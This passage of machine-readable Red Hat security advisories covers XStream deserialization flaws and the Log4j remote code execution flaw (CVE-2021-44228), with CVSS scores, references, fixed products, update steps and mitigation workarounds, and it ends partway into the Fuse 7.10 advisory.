"title": "Vulnerability description"
},
{
"category": "summary",
"text": "xstream: Server-side request forgery (SSRF) via unsafe deserialization of jdk.nashorn.internal.runtime.Source$URLData",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. If you rely on XStream\u0027s default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.18.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\n\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-39152"
},
{
"category": "external",
"summary": "RHBZ#1997793",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997793"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-39152",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39152"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39152",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39152"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-xw4p-crpj-vjx2",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-xw4p-crpj-vjx2"
}
],
"release_date": "2021-08-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "xstream: Server-side request forgery (SSRF) via unsafe deserialization of jdk.nashorn.internal.runtime.Source$URLData"
},
{
"cve": "CVE-2021-39153",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2021-08-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1997795"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "xstream: Arbitrary code execution via unsafe deserialization of Xalan xsltc.trax.TemplatesImpl",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-39153"
},
{
"category": "external",
"summary": "RHBZ#1997795",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997795"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-39153",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39153"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39153",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39153"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-2q8x-2p7f-574v",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-2q8x-2p7f-574v"
}
],
"release_date": "2021-08-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "xstream: Arbitrary code execution via unsafe deserialization of Xalan xsltc.trax.TemplatesImpl"
},
{
"cve": "CVE-2021-39154",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2021-08-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1997801"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "xstream: Arbitrary code execution via unsafe deserialization of javax.swing.UIDefaults$ProxyLazyValue",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers the Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-39154"
},
{
"category": "external",
"summary": "RHBZ#1997801",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997801"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-39154",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39154"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39154",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39154"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-6w62-hx7r-mw68",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-6w62-hx7r-mw68"
}
],
"release_date": "2021-08-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "xstream: Arbitrary code execution via unsafe deserialization of javax.swing.UIDefaults$ProxyLazyValue"
},
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"RHPAM 7.12.0"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Low"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
}
]
}
rhsa-2021_5126
Vulnerability from csaf_redhat
Published
2021-12-14 16:19
Modified
2024-12-12 01:17
Summary
Red Hat Security Advisory: Red Hat Integration Camel Extensions for Quarkus GA security update
Notes
Topic
A security update to Red Hat Integration Camel Extensions for Quarkus 2.2 is now available. The purpose of this text-only errata is to inform you about the security issues fixed.
Red Hat Product Security has rated this update as having a security impact
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
Details
This update of Red Hat Integration - Camel Extensions for Quarkus serves as a replacement for 2.2 GA and includes the following security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "A security update to Red Hat Integration Camel Extensions for Quarkus 2.2 is now available. The purpose of this text-only errata is to inform you about the security issues fixed.\n\nRed Hat Product Security has rated this update as having a security impact\nof Critical. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "This update of Red Hat Integration - Camel Extensions for Quarkus serves as a replacement for 2.2 GA and includes the following security Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5126",
"url": "https://access.redhat.com/errata/RHSA-2021:5126"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#critical",
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=red.hat.integration\u0026version=2021-Q4",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=red.hat.integration\u0026version=2021-Q4"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_integration/2021.q4",
"url": "https://access.redhat.com/documentation/en-us/red_hat_integration/2021.q4"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5126.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Integration Camel Extensions for Quarkus GA security update",
"tracking": {
"current_release_date": "2024-12-12T01:17:31+00:00",
"generator": {
"date": "2024-12-12T01:17:31+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5126",
"initial_release_date": "2021-12-14T16:19:04+00:00",
"revision_history": [
{
"date": "2021-12-14T16:19:04+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-14T16:19:05+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:17:31+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Integration Camel Quarkus",
"product": {
"name": "Red Hat Integration Camel Quarkus",
"product_id": "Red Hat Integration Camel Quarkus",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:camel_quarkus:2.2"
}
}
}
],
"category": "product_family",
"name": "Red Hat Integration"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Integration Camel Quarkus"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T16:19:04+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Integration Camel Quarkus"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5126"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"Red Hat Integration Camel Quarkus"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Integration Camel Quarkus"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Critical"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
}
]
}
rhsa-2021_5134
Vulnerability from csaf_redhat
Published
2021-12-14 21:31
Modified
2024-12-12 01:18
Summary
Red Hat Security Advisory: Red Hat Fuse 7.10.0 release and security update
Notes
Topic
A minor version update (from 7.9 to 7.10) is now available for Red Hat Fuse. The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
This release of Red Hat Fuse 7.10.0 serves as a replacement for Red Hat Fuse 7.9, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.
Security Fix(es):
* log4j-core (CVE-2020-9488, CVE-2021-44228)
* nodejs-lodash (CVE-2019-10744)
* libthrift (CVE-2020-13949)
* xstream (CVE-2020-26217, CVE-2020-26259, CVE-2021-21341, CVE-2021-21342, CVE-2021-21343, CVE-2021-21344, CVE-2021-21345, CVE-2021-21346, CVE-2021-21347, CVE-2021-21348, CVE-2021-21349, CVE-2021-21350, CVE-2021-21351)
* undertow (CVE-2020-27782, CVE-2021-3597, CVE-2021-3629, CVE-2021-3690)
* xmlbeans (CVE-2021-23926)
* batik (CVE-2020-11987)
* xmlgraphics-commons (CVE-2020-11988)
* tomcat (CVE-2020-13943)
* bouncycastle (CVE-2020-15522, CVE-2020-15522)
* groovy (CVE-2020-17521)
* tomcat (CVE-2020-17527)
* jetty (CVE-2020-27218, CVE-2020-27223, CVE-2021-28163, CVE-2021-28164, CVE-2021-28169, CVE-2021-34428)
* jackson-dataformat-cbor (CVE-2020-28491)
* jboss-remoting (CVE-2020-35510)
* kubernetes-client (CVE-2021-20218)
* netty (CVE-2021-21290, CVE-2021-21295, CVE-2021-21409)
* spring-web (CVE-2021-22118)
* cxf-core (CVE-2021-22696)
* json-smart (CVE-2021-27568)
* jakarta.el (CVE-2021-28170)
* commons-io (CVE-2021-29425)
* sshd-core (CVE-2021-30129)
* cxf-rt-rs-json-basic (CVE-2021-30468)
* netty-codec (CVE-2021-37136, CVE-2021-37137)
* jsoup (CVE-2021-37714)
* poi (CVE-2019-12415)
* mysql-connector-java (CVE-2020-2875, CVE-2020-2934)
* wildfly (CVE-2021-3536)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "A minor version update (from 7.9 to 7.10) is now available for Red Hat Fuse. The purpose of this text-only errata is to inform you about the security issues fixed in this release.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
